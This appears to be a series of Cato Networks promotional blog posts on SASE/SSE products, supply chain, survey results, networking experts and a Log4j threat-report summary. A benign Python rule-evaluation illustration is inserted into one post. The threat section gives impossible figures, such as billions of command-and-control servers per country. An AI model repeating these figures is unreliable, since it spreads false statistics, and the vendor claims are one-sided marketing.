Arista and Cisco are not unique in their sales malaise. Gartner Principal Research Analyst Kanishka Chauhan reported the semiconductor shortage will severely disrupt the supply chain and will constrain the production of many electronic equipment types, including the networking industry.
All of which begs the question, why hasn’t Cato been impacted?
Being a cloud service obviously minimizes the effects of the log-jammed supply chain. Software keeps flowing as long as the developers keep coding. But Cato does have some hardware dependencies, most notably the Cato Socket, Cato’s edge SD-WAN device. And while the Socket is very “thin”, pushing most processing into Cato SASE PoPs, it’s still reliant on the components being impacted by today’s supply chain issues.
Immediate Action: Executive Buy-in is Critical to Addressing Supply Chain Problems
To address the problem, we protected ourselves by expanding our supply chain in a series of moves that required buy-in at the highest levels of Cato.
The first order of business was to understand what components in a Socket’s bill of materials (BOM) were at the highest risk of unavailability. The BOM is the list of materials and components required to construct a product, the Cato Socket in this case, and the specific directions needed for procuring and using the materials. In reviewing the BOM, we first identified any chipsets that had an expected delay of one year, which is highly problematic for any supplier.
Our solution was to help our Socket manufacturers source components from alternative component suppliers. Being a cloud service, Cato could be very flexible in the terms and conditions we gave to our manufacturers, enabling them to source components from suppliers with whom normally they might not have been able to negotiate profitable terms. (All suppliers are trusted and certified to ensure quality standards are met.)
The second action we took was in logistics. We changed how we transported goods from the manufacturer in Taiwan to strategic distribution centers around the world. Like most vendors, we normally ship components by sea, which is the most economical approach, but also takes the most time. Instead, we began shipping products by air, eliminating the lengthy sea travel time and long delays at backed-up seaports.
Long Term Action: Increasing Component Supplies Prevents Impact of Forecasted Shortages
Recognizing that there’s no quick fix to the component shortage, we took steps to manage the situation over the long term. We decided to increase our production orders with our manufacturer to cover forecasts at least through the next two years. By making this early commitment, the manufacturer could plan for the necessary components and begin stocking them now. We also communicate regularly with the manufacturer to monitor problem areas in acquiring components.
Next, Cato is considering having our Socket manufacturer build “problematic kits” of the major at-risk components. A kit consists of the Socket components with the longest lead times. Cato is willing to commit to purchasing thousands of kits to have on hand. A kit is a fraction of the cost of a complete Socket since it’s just a bunch of parts. It’s worth acquiring these components and stockpiling them as they become available to reduce the lead time of buying them when they are needed. Once again, this increases our agility and reduces our long-term risk.
To better prepare for the future, Cato is testing alternative components to the parts of the current Socket that are problematic to source. A replacement part may have the same delivery issues but it’s still worth having options to give us flexibility. If we choose alternative components, they will be certified by both the manufacturer and Cato to ensure they meet our performance standards.
In addition, Cato continually evaluates new manufacturers for multisourcing Socket production. By not relying on any one platform or company, Cato ensures a continuous flow of products.
The Cloud: Cato’s Key Advantage in Weathering the Supply Chain Dilemmas
Being a cloud-first company affords Cato great flexibility in weathering supply chain shortages and disruptions. Through some planning and a bit of ingenuity, we’ve been able to ensure continued component and product availability for the foreseeable future.
The Sound of the Trombone
I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world.
Why “The Trombone Effect” Is So Detrimental to IT Teams and End Users
The “Trombone Effect” occurs in a network architecture that forces a distributed organization to use a single secure exit point to the Internet. Simply put, network traffic from remote locations and mobile users is backhauled to the corporate datacenter, where it exits to the Internet through the corporate security appliance stack. Network responses then flow back through the same stack and travel from the data center to the remote user.
This twisted path, resembling the bent pipes of a trombone, has a negative impact on latency and therefore on the user experience. Why does this compromise exist? If you are in a remote office, your organization may not be able to afford a stack of security appliances (firewall, secure web gateway or SWG, etc.) in your office. Affordability is not just a matter of money. Distributed appliances have policies that need to be managed and if the appliance fails or requires maintenance – someone has to take care of it at that remote location. Mobile users are left unprotected because they are not “behind” the corporate network security stack.
Do Regional Hubs Mitigate the Impact of “Trombone Effect?”
The most recent answer to the Trombone Effect is the use of “regional hubs”. These “mini” data centers host the security stack and shorten the distance between remote locations and security exit points to the internet. This approach reduces the end user performance impact, by backhauling to the nearest hub. However, the fundamental issue of managing multiple instances of the security stack remains as well as the need to set up distributed datacenters and address performance and availability requirements.
Solving the “Trombone Effect” with Cato SSE 360
Cato Networks solves the “Trombone Effect” with Cato’s Security Service Edge 360 (SSE 360), which ensures that security is available everywhere that users, applications, and data reside. Rather than making security available in just a few places,
Threat prevention and data protection are uniformly enforced via our private backbone spanning 75+ PoPs supporting customers in 150+ countries. Because the PoPs reside within 25 ms of all users and locations, companies don’t need to set up regional hubs to secure the traffic, alleviating the cost, complexity and responsibility for capacity planning and management, while ensuring optimal security posture without compromising the user experience.
Next Steps: Get Clear on Cato SSE 360
If you are a victim of the “Trombone Effect,” then Cato Networks can easily solve this with SSE 360. Visit our Cato SSE 360 product page to learn about our architecture, capabilities, benefits, and use cases, and receive a thorough overview of our service offering.
Inside SASE: GigaOm Review of 20 Vendors Finds Platforms Are Far and Few
Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions.
That is a mistake.
SASE innovation has always been about the convergence of security and networking capabilities into a cloud service. The core capabilities of SASE are not new. Their convergence in appliances isn’t new either; that’s what we call UTMs. It’s the delivery as a secure networking global cloud service that is so revolutionary. Only with one cloud service connecting and securing the entire enterprise – remote users, sites, and cloud resources – worldwide can enterprises realize the cost savings, increased agility, operational simplicity, deeper security insight and more promised by SASE.
Too often, though, media and analyst communities miss the essential importance of a converged cloud platform. You’ll read about vendor market share without consideration if the vendor is delivering a converged solution or if it’s just their old appliances marketed under the SASE brand. You’ll see extensive features tables but very little about whether those capabilities exist in one software stack, managed through one interface – the hallmarks of a platform.
GigaOm’s Radar Report Accurately Captures State of SASE Platform Convergence
Which is why I found GigaOm’s recent Radar Report on the Secure Service Access (SSA) market so significant. It is one of the few reports to accurately measure the “platform-ness” of SASE/SSA/SSE solutions. SSA is GigaOm’s term for the security models being promoted as SSE, SASE, ZTNA, and XDR along with networking capabilities, such as optimized routing and SD-WAN. The report assesses more than 20 vendor solutions, providing detailed writeups and recommendations for each.
Those hundreds of data points are then collapsed into the GigaOm Radar that provides a forward-looking perspective of the vendor offerings. GigaOm plots vendor solutions across a series of concentric rings, with those set closer to the center judged to be of higher overall value. Vendors are characterized based on their degree of convergence into a platform (feature vs. platform play) and their robustness (maturity vs. innovation). The length of the arrow indicates the predicted evolution over the coming 12-18 months.
The GigaOm Radar for SSA found Cato and Zscaler to be the only Leaders who were outperforming the market.
The Findings: Platform Convergence is Not a Given in the SASE Market
The report found Cato SASE Cloud to be one of the few SSA platforms capable of addressing the networking and security needs for large enterprises, MSPs, and SMEs.
The Cato SASE Cloud provides outstanding enterprise-grade network performance and predictability worldwide by connecting sites, remote users, and cloud resources across the optimized Cato Global Private Backbone. Once connected, the Cato SSE 360 pillar of Cato SASE Cloud enforces granular corporate access policies on all applications -- on-premises and in the cloud – and across all ports and protocols, protecting users against threats, and preventing sensitive data loss.
Of GigaOm’s key SSA Criteria, the Cato SASE Cloud was the only Leader to be ranked “Exceptional” in seven of eight categories:
Defense in Depth
Unified Threat Management
Autonomous Network Security
And the company found a similarly near-perfect score when it came to the core networking and network-based security capabilities comprising SSA solutions: SD-WAN, FWaaS, SWG, CASB, ZTNA, and NDR.
“Founded in 2015, Cato Networks was one of the first vendors to launch a global cloud-native service converging SD-WAN and security as a service,” says the report. “Developed in-house from the ground up, Cato SASE Cloud connects all enterprise network resources—including branch locations, cloud and physical data centers, and the hybrid workforce—within a secure, cloud-native service. Delivering low latency and predictable performance via a global private backbone”
To learn more, download the report.
Cato SASE Cloud: Enjoy Simplified Configuration and Centralized, Global Policy Delivery
In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You may be familiar with the concept of localized versus centralized policies that exist within legacy SD-WAN architectures, but Cato’s cloud-native SASE architecture simplifies configuration and policy delivery across all capabilities from a true single management application.
Understanding Cato’s Management Application from Its Architecture
To understand policy design within the Cato Management Application, it’s useful to discuss some of Cato’s architecture. Cato’s cloud was built from the ground up to provide converged networking and security globally. Because of this convergence, automated security engines and customized policies benefit from shared context and visibility, allowing true single-pass processing and more accurate security verdicts.
Each piece of context can typically be used for policy matching across both networking and security capabilities within Cato’s SASE Cloud. This includes elements like IP address, subnet, username, group membership, hostname, remote user, site, and more. Additionally, policy rules can be further refined based on application context including application (custom applications too), application categories, service, port range, domain name, and more. All created rules apply based on the first match in the rule list from the top down.
A Close Look at Cato’s Networking Policy
Cato’s SASE Cloud is comprised of over 75 (and growing) top-tier data center locations, each connected with multiple tier 1 ISP connections forming Cato’s global private backbone. Cato automatically chooses the best route for your traffic dynamically, resulting in a predictable and reliable connection to resources compared with public Internet. Included features like QoS, TCP Acceleration, and Packet Loss Mitigation allow customers to fine-tune performance to their needs.
1. Cato Network Rules are pre-defined to meet common use cases. They can be easily customized, or you can create your own rules based on context type.
By default, the Cato Management Application has several pre-defined network rules and bandwidth priority levels to meet the most common use cases, but customers can quickly customize these policies or create their own rules based on the context types mentioned above. Customers can control the use of TCP acceleration and Packet Loss Mitigation and assign a bandwidth priority level to the traffic. Additionally, traffic routing across Cato’s backbone is fully under the customer’s control, allowing egressing from any of our PoPs to get as close to the destination as possible. You can even egress traffic from an IP address that is dedicated to your organization, all without opening a support ticket.
2. Bandwidth Priorities: With Cato, it’s easy to assign a bandwidth priority level to the traffic.
Cato’s Security Policies Share a Similar, Top-Down Logic
Cato’s security policies follow the same top-down logic and benefit from the same shared context as the network policy.
3. Internet Firewall Rules enforce company-driven access policies to Internet websites and apps based on app name, category, port, protocol and service.
The Internet Firewall utilizes a block-list approach and is intended to enforce company-driven access policies to Internet websites and applications based on the application name, application category, port, protocol, and service. Unlike legacy security products, customers do not have to manage and attach multiple security profiles to their rules. All security engines (IPS, Anti-Malware, Next-Generation Anti-Malware) are enabled globally and scan all ports and protocols with exceptions created only when needed. This provides a consistent security posture for all users, locations, and devices without the pitfalls and misconfigurations of multiple security profiles.
4. Cato’s WAN Firewall provides granular control of traffic between all connected edges.
Cato’s WAN Firewall provides granular control of traffic between all connected edges (Site, Data Center, Cloud Data Center, and SDP User). Full mesh connectivity is possible, but the WAN Firewall has an allow-list approach to encourage a zero-trust access approach. The combination of source, destination, device, application, service, and other contexts is extremely flexible, allowing administrators to easily configure the necessary access between their users and locations. For example, typically only IT staff and management servers will need to connect to mobile SDP users directly, and this can be allowed in just a few clicks, or if you want to allow all SMB traffic between a site where your users are and a site with your file servers, that can also be done just as easily.
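The first-match, top-down evaluation described above, combined with a block-list default for the Internet Firewall and an allow-list default for the WAN Firewall, can be modelled in a few lines to see how rule order changes the verdict and to flag rules that can never fire. This is an added illustration, not Cato's code or API: the `Rule` and `Policy` classes, the field names, and the sample rules are all hypothetical and constructed for the example.

```python
from dataclasses import dataclass, field


@dataclass
class Rule:
    name: str
    action: str  # "allow" or "block"
    # Context field -> set of accepted values; a field left out means "any".
    match: dict = field(default_factory=dict)

    def matches(self, flow: dict) -> bool:
        return all(flow.get(k) in vals for k, vals in self.match.items())

    def covers(self, other: "Rule") -> bool:
        """True when every flow `other` can match is also matched by self."""
        for k, vals in self.match.items():
            narrower = other.match.get(k)
            if narrower is None or not narrower <= vals:
                return False
        return True


@dataclass
class Policy:
    name: str
    default_action: str  # verdict when no rule matches
    rules: list

    def evaluate(self, flow: dict):
        """Return (action, rule name) of the first matching rule, top down."""
        for rule in self.rules:
            if rule.matches(flow):
                return rule.action, rule.name
        return self.default_action, "<default>"

    def shadowed(self):
        """List (rule, shadowing rule, actions conflict) for unreachable rules."""
        findings = []
        for i, later in enumerate(self.rules):
            for earlier in self.rules[:i]:
                if earlier.covers(later):
                    findings.append(
                        (later.name, earlier.name, earlier.action != later.action)
                    )
                    break
        return findings


# Constructed sample policy: block-list model, so unmatched traffic is allowed.
INTERNET_FW = Policy("internet", "allow", [
    Rule("allow-it-all-apps", "allow", {"user_group": {"it"}}),
    Rule("block-remote-admin-tools", "block", {"app_category": {"remote-access"}}),
    # Never reached: the first rule already matches every IT flow.
    Rule("block-it-p2p", "block", {"user_group": {"it"}, "app_category": {"p2p"}}),
])

# Constructed sample policy: allow-list model, so unmatched traffic is blocked.
WAN_FW = Policy("wan", "block", [
    Rule("allow-smb-branch-to-files", "allow",
         {"source_site": {"branch-1"}, "dest_site": {"file-servers"},
          "service": {"smb"}}),
    Rule("allow-it-to-sdp-users", "allow",
         {"user_group": {"it"}, "dest_site": {"sdp-users"}}),
])

if __name__ == "__main__":
    for policy in (INTERNET_FW, WAN_FW):
        for rule, by, conflict in policy.shadowed():
            kind = "conflicting" if conflict else "redundant"
            print(f"{policy.name}: {rule} is shadowed by {by} ({kind})")
    print(WAN_FW.evaluate({"source_site": "branch-1",
                           "dest_site": "file-servers", "service": "rdp"}))
```

A shadowed rule with a conflicting action is the case worth reviewing first, because the intended block silently never applies.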
More About Cato’s Additional Security Capabilities
Cato has additional security capabilities beyond what we’ve covered, including DLP and CASB, which have their own policy sets, and you may see more added as we continue to develop and deploy new capabilities. As with what you’ve seen so far, you can expect simple, easy-to-build policies with powerful granular controls based on the shared context of both networking and security engines. Of course, all policy and service controls will be delivered from a true single-management point – the Cato Management Application.
Cato SSE 360 = SSE + Total Visibility and Control
For more information on Cato’s entire suite of converged network security, please be sure to read our SSE 360 Whitepaper. Go beyond Gartner’s defined scope for an SSE service that offers full visibility and control of all WAN, internet, and cloud. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different from traditional SSE vendors.
Cato 2022 Mid-Year Survey Result Summary
SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet.
What survey are you talking about?
Twice a year, Cato Networks runs a global survey that collects and analyzes the state of enterprise networking and security. Our last survey has broken all records with 3129 respondents from across the globe. More accurately, 37% from America, 33% from Europe, the Middle East and Africa, and 30% from Asia and Australia.
52% of them were channel partners (not necessarily ours, yet), and 48% were end customers. All of them, collectively, work with network and network security on a daily basis and know a thing or two about highest priority challenges faced by the modern enterprise.
Respondent demographics also indicate that we are looking at a versatile and reliable dataset. In terms of enterprise sizes, 27% of respondents have more than 100 sites to manage, 22% have between 25 to 100, and 51% have up to 25 sites. 44% of them operate a global organization compared to 56% who are regional or national.
When asked about their position and responsibilities, 62% confirmed they hold an IT management or leadership position. 27% with specific focus on network and 17% with specific focus on security.
We believe it’s fair to say the results we’re going to share here are as objective as possible.
The Market Is Aware of SASE and SSE, But Isn’t Clear on the Differences
The market is showing awareness and understanding of both SASE (est. 2019) and Security Service Edge (SSE) (est. 2021.) However, the rise of “too many acronyms” is leading to market confusion, specifically related to architecture, value propositions and differentiation.
When we asked, “How well do you believe you understand the SASE architecture and its benefits?”, 45% responded that they feel they understand both very well. It would look very positive if we stopped here, but at the same time, 20% felt vague regarding the architecture, 12% felt vague about the value, and 23% felt vague about both. Oh no.
The confusion continued even further when we asked if they know the difference between SASE and SSE. It wasn’t a test, but only 47% passed. Very close to the 45% who felt confident on SASE’s architecture and value.
Going about it from another angle, we asked “Do you consider SSE as an interim step to SASE?”. 29% answered they do, and 38% answered they don’t. The red flag is the 33% who answered that they aren’t sure what the difference is between SSE and SASE.
Choose Wisely: Will it Be One or Multi-Vendor SASE?
In answer to our question “What is your SASE migration timeline?”, 17% responded it already started in 2020 or 2021, 18% responded that it is happening this (2022) year, and 44% said that it’s targeted for 2023.
Similarly, 54% reported they already have C-level sponsorship for their SASE project from either their CEO (12.5%), CIO (24%), CFO (5%) or CISO (12.5%).
But with so much focus on SASE and confusion surrounding SSE, what’s most important to pay attention to?
36% of respondents who already have SD-WAN in their networks indicated that they plan to replace it. 29% plan to deploy SSE as an interim step towards full SASE deployment, and 38% told us they are going all in on SASE.
On top of those findings, 40% indicated that a single-vendor SASE is very important in their vendor selection, and 25% ranked this as extremely important. This correlates very well with 77% who indicated a single management for all network and security infrastructure is very or extremely important.
So, what’s the gist here?
The bottom line here is simple. SASE is the end-game and the SASE revolution is currently well underway.
Every IT leader and team should both strategize and prioritize their path to SASE. It can be a gradual multi-project approach or undertaken as a single project. It can rely on an existing network and security stack or a refresh of legacy products.
Crowd wisdom also shows that so many people who work daily with SD-WAN, SASE and SSE value the importance of single-vendor and single management solutions, and so should you.
So, when your C-level sponsor asks you about your SASE migration strategy, make sure you are aligned with the voice of the industry, that you have a plan, and that you know how to choose the right vendor for your enterprise.
And what about the confusion between SASE and SSE? What about those who don’t feel they know enough about one or both acronyms? It’s a perfectly normal place to be in, and a challenge anyone can easily overcome in just a few short hours.
Cato Networks offers free SASE and SSE education courses to get you up to speed and on par with industry standards. Check out our free SASE and SSE certification courses, to expand your knowledge base, and learn about these new and evolving categories.
Now how ‘bout that?
15 Networking Experts To Follow on LinkedIn
Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which address the problems du jour.
But how can IT teams and network architects make heads or tails of these rapid shifts? Such intense global and industry-wide changes require the advice of experts who are familiar with both the technical and business landscape, and can speak to the newest technology trends.
Below, we’ve listed 15 of the top experts in enterprise networking and SD-WAN that we recommend following on Linkedin. They are masters in their domain, and industry leaders who can help you stay up-to-date with the latest developments in the world of enterprise networking. They have many years of hands-on and consulting experience, so when they speak about enterprise networks, it’s always worth hearing what they have to say.
1. Greg Ferro
Greg is a co-founder of Packet Pushers, an online media outlet that has covered data, networking and infrastructure for over 12 years. Packet Pushers provides valuable information that can help nearly any professional in the networking field including insights on: public cloud usage, SD-WAN, five minute vendor news, IPv6, and more. Home to a series of podcasts, blog posts, articles, a Spotify channel, and even a newsletter - it’s a multi-media experience. Besides Packet Pushers, Greg runs another well-known industry blog, EtherealMind.com.
2. Ivan Pepelnjak
Ivan is a blogger at ipSpace.net, an author, a webinar presenter and a network architect. His writings and webinars focus mainly on network automation, software-defined networking, large-scale data center tech, network virtualization technologies and advanced IP-based networks. By following him and/or ipSpace.net, you will have access to a plethora of network technology resources, including online courses, webinars, podcasts and blogs.
3. Orhan Ergun
Orhan is an IT trainer, an author and a network architect. On Linkedin, Orhan shares his ideas and thoughts, as well as updates about his recent webinars, blog posts and training courses, to his ~40,000 followers. He also spices up his updates by sprinkling in funny memes with inside IT humor. Orhan’s courses can be found on his website at orhanergun.net, where he focuses on network design, routing, the cloud, security and large-scale networks.
4. Jeff Tantsura
Jeff is a Sr. Principal Network Architect at Azure Networking, as well as a writer, editor, podcaster, patent inventor and advisor to startups in networking and security areas. His podcast, “Between 0x2 Nerds”, is bi-monthly and discusses networking topics including: network complexity, scalability, up-and-coming technologies and more. The podcast hosts industry experts, software engineers, academia researchers and decision-makers - so when listening to it, you can expect to hear from professionals with a wide variety of opinions, points of view and areas of expertise!
5. Daniel Dib
Daniel Dib is a Senior Network Architect experienced in routing, switching and security. He is also a prolific content creator, writing blog posts for his own networking-focused blog “Lost in Transit”, as well as additional publications, like “Network Computing”. It’s a great choice if you’re interested in learning more about CCNA, CCNP, CCDP, CCIE, CCDE and all of our various certification courses. His social media posts cover both professional and personal matters, for those of you who like to get to know the person behind the professional.
6. David Bombal
David Bombal is an author, instructor and YouTuber, creating content for networking professionals across multiple channels. Focusing on topics like network automation, Python programming, ethical hacking and Cisco exams, his videos, podcasts and courses provide a wide range of resources for beginners and advanced learners. David’s online Discord community is also worth visiting, as an online venue for ongoing IT support and communication.
7. John Chambers
John is the CEO of JC2 Ventures and was previously at Cisco for 26 years, serving as CEO, Chairman and President, among other positions. With more than 263,000 followers on Linkedin and more than 22,000 on Twitter, John is an important source of information for networking professionals interested in a broader, more strategic view of the technological market.
8. Tom Hollingsworth
Tom is a networking analyst at Foskett Services and the creator of networkingnerd.net, an online media outlet where he offers a tongue-in-cheek take on networking news and trends. In his latest post he compares Apple Air Tags and lost luggage at airports to SD-WAN. If blog posts aren’t your thing, you can also hear what Tom has to say on his “Tomversations” YouTube playlist or by attending the “Tech Field Day” events he organizes.
9. Matt Conran
Matt is a cloud and network architecture specialist with more than 20 years of networking experience in support, engineering, network design, security and architecture. Matt juggles consultancy as an independent contractor with publishing technical content on his website “Network Insight” and with creating training courses on Pluralsight. On his website, you can find helpful explainer videos and posts on a variety of networking topics including cloud security, observability, SD-WAN and more.
10. Russ White
Russ White is an infrastructure architect, co-host of “The Hedge”, a computer network podcast, and blogger. He has also published a number of books on network architecture. His Linkedin posts are a bulletin board of his latest blog and podcast updates, so by following him you can keep track of his latest publications, ranging from hands-on network advice to info on how technology will be shaped by global events.
11. Ben Hendrick
Ben is the Chief Architect in the Office of the CTO of the Global Secure Infrastructure Domain at Microsoft. His Linkedin posts focus mainly on recent cybersecurity updates, covering specific events as well as industry trends. With nearly 35 years of network and security experience, you can be sure his daily updates are based on broad insights and a deep familiarity with the networking and security space.
12. Ashish Nadkarni
Ashish leads two research groups at analyst firm IDC. Both of them - Infrastructure Systems, Platforms and Technologies (ISPTG) and BuyerView Research - are part of IDC's Worldwide Enterprise Infrastructure practice. Ashish delivers reports, blog posts and webinars; follow his Linkedin feed to keep up with the latest trends and technologies in networking. Examples of his previous posts include preparing for IT infrastructure supply shortages, storage for AI workloads, and takeaways from networking industry events.
13. Erik Fritzler
Erik has nearly 25 years of experience in network architecture and regularly posts blogs on “Network World”. He specializes in SD-WAN, Network Design, and Engineering and IT Security. In his recent blog post “Why WAN metrics are not enough in SD-WAN policy enforcement”, he discusses how SD-WAN captures metrics that go far beyond the typical WAN measurements including application response time, network transfer time, and server response time.
14. Matt Simmons
Matt is an SRE at SpaceX, where he is responsible for the infrastructure around the ground control plane. His team owns the OS installation on bare metal, up through the Kubernetes orchestration layer, as well as monitoring, CI/CD and more. If you’re interested in learning about technological “How To’s” and the science of space, Matt’s Linkedin is the place for you. Matt also has a Github repository where he hosts projects and experiments that may be helpful to networking professionals.
15. Cato Networks
Did you know that Cato Networks is also on social? Our social channels are a great way to keep on top of SASE and Security Service Edge (SSE) updates, read original research and even get access to “member only” exclusive events. We run surveys, host giveaways and include updates from industry experts, like our CEO and COO, Shlomo Kramer (co-founder of Check Point) and Gur Shatz (co-founder of Imperva).
Who Do You Follow?
As business needs and technologies evolve, it can be difficult to constantly keep up with the changes. Experts like the 15 listed above can help, by passing on their know-how, insights and experience through their LinkedIn, blogs, YouTube channels, or whatever way you prefer to consume content.
So, who do you follow? Share with us on LinkedIn.
SSE (Security Service Edge): The Complete Guide to Getting Started
In 2021, Gartner introduced a new security category - SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in learning more information, we highly recommend you read the complete whitepaper.
What is SSE?
Before we explain SSE, let’s start by giving more context. In 2019, Gartner introduced the new SASE market category. SASE (Secure Access Service Edge) is the convergence of SD-WAN and network security as a cloud-native, globally-delivered service. As a result, SASE solutions can provide work-from-anywhere (WFA) users with optimized and secure access to any application. From the security side, SASE includes SWG, CASB/DLP, FWaaS and ZTNA.
Then, in 2021, Gartner introduced another related market category called SSE (Security Service Edge). SSE offers a more limited scope of converged network security than SASE. SSE converges SWG, CASB/DLP and ZTNA security point solutions into a single, cloud-native service. Therefore, SSE provides secure access to internet and SaaS applications, but does not address the network connectivity and east-west WAN security aspects of that access, which remain a separate technology stack.
SSE vs. SASE
To sum up the comparison:
| | SASE | Traditional SSE Services |
|---|---|---|
| Year Introduced | 2019 | 2021 |
| Technological Pillars | Converged Networking and Network Security | Limited convergence of network security only |
| Key Components | SD-WAN, SWG, CASB/DLP, FWaaS, ZTNA, RBI, Unified Management | SWG, CASB/DLP and ZTNA |
| Business Value | Resiliency, security, optimization, visibility and control | Limited network security (secure access to SaaS and web traffic) |
Why Do Businesses Need SSE? (Traditional SSE Capabilities and Benefits)
Optimized and secure global access to internet and SaaS applications and data is essential for businesses’ technical requirements and the evolving threat landscape. But rigid security architectures and disjointed point solutions lower business agility and increase risk. This is where SSE shines.
Consistent security policy enforcement - full inspection of traffic between any two edges while enforcing threat prevention and data protection policies
Reduced attack surface with Zero Trust Network Access (ZTNA) - ensuring users can only access authorized applications
Elastic, high performance security inspection - securing traffic at scale through a global backbone of scalable Points of Presence (PoPs)
Improved security posture - monitoring the threat landscape and deploying mitigations to emerging threats through the SSE provider’s SOC (instead of the IT staff)
Reduced enterprise IT workload without customer involvement - continuously updating the cloud service with new enhancements and fixes, while reducing workload
As a result of these benefits, SSE offers businesses secure public cloud and web access, threat detection and prevention capabilities, secure and optimized remote access and sensitive Data Loss Prevention.
How to Get Started with SSE
Today, many businesses are still using legacy architectures. This impedes digital transformation because:
Legacy networks are built around physical corporate locations - a digital architecture requires re-architecture of the network
Centralized (backhauling) security models slow down secure cloud access - direct secure Internet should be available at any location for any user
Legacy security solutions can’t scale - they can’t support a hybrid workforce working from anywhere
Disjointed solutions are fragmented and complex to manage - this requires more work from IT and increases the likelihood of manual configuration errors
To get started with SSE, businesses should choose an SSE vendor that can help them overcome these challenges. Such a vendor will provide total visibility and control across all edges and all traffic, support a global footprint with high performance security, converge management and analytics with a single pane of glass, and ensure a future-proof and resilient SSE service.
Introducing Cato SSE 360: Going Beyond Gartner’s SSE
Cato SSE 360 goes beyond Gartner’s scope of SSE, to provide total visibility, optimization and control for all traffic, users, devices, and applications everywhere. Not only does it provide secure and optimized access to the internet and public cloud applications, but also to WAN resources and cloud datacenters, reducing your attack surface and eliminating the need for additional point solutions like firewalls, WAN optimizers and global backbones. And, Cato SSE 360 provides a clear path to single-vendor SASE convergence through gradual migration, if and when your organization requires. Follow the link for more information about Cato SSE 360.
Cato SSE 360 reduces cost and complexity with simple management through a single pane of glass, self-healing architecture and defenses that evolve automatically while mitigating emerging threats. Customers can choose to manage themselves or co-manage with partners.
Cato SSE 360 Components
Cato SSE 360 provides the following platform components:
Cloud-native security service edge
Cato global private backbone
Cato SDP clients
IPsec-enabled devices and Cato Socket SD-WAN for locations
Comprehensive management application for analytics and policy configuration
As a result, Cato SSE 360 is ideal for the following use cases:
Scalable hybrid work
Gradual cloud migration
Secure sensitive data
Instant deployment of security capabilities
Future-proofing and ongoing security maintenance
Seamless, single-vendor SASE convergence
Cato SSE 360 extends SSE by providing full visibility and control across all traffic, optimized global application access and is the only service which supports a seamless path to a complete, single-vendor SASE, if and when required. Read the full Cato SSE 360 whitepaper and get started on your SSE journey today.
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report
Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability.
Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability has increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including cyber-attacks on Ukrainian organizations.
Interestingly, number two on the list of the top five CVE exploit attempts was a Java vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double the previous quarter) to exploit this vulnerability for initial access. This research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell or CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk.
Majority of Exploitation Events Originated in the U.S.
Understanding where attacks originate from or who (or where) the malware communicates to is a critical part of any organization's threat response strategy. Attackers are aware of the fact that traffic to or from certain countries may be blocked, inspected or investigated and that’s the reason why a majority of them ensure that their command and control (C&C) infrastructure is hosted in a country that is labeled as “safe”. While the U.S. is the most favored destination (hosts 17.3 billion C&C servers), China comes second (with 2 billion C&C servers), followed by Germany (1.66 billion), UK (1.29 billion) and Japan (1 billion).
Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket
After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations.
Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter.
Attackers Are Frequently Scanning Network Hardware and Software For Initial Access
Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all: once adversaries have initial access, they actively search data from local systems (T1005 - 9.5 million incidents), look for valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not accessible (T1110 - 6.9 million incidents).
Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok
While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short-form video-sharing app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.
What Can Organizations Do To Protect Themselves?
While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help:
Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.
Patch all applications regularly and ensure they are running the most up-to-date software.
Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.
When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time till they are able to apply necessary and permanent fixes.
Train staff regularly so they do not fall prey to phishing and social engineering scams.
Try and restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments as this can significantly minimize risk and lower possibility of infectious lateral movement.
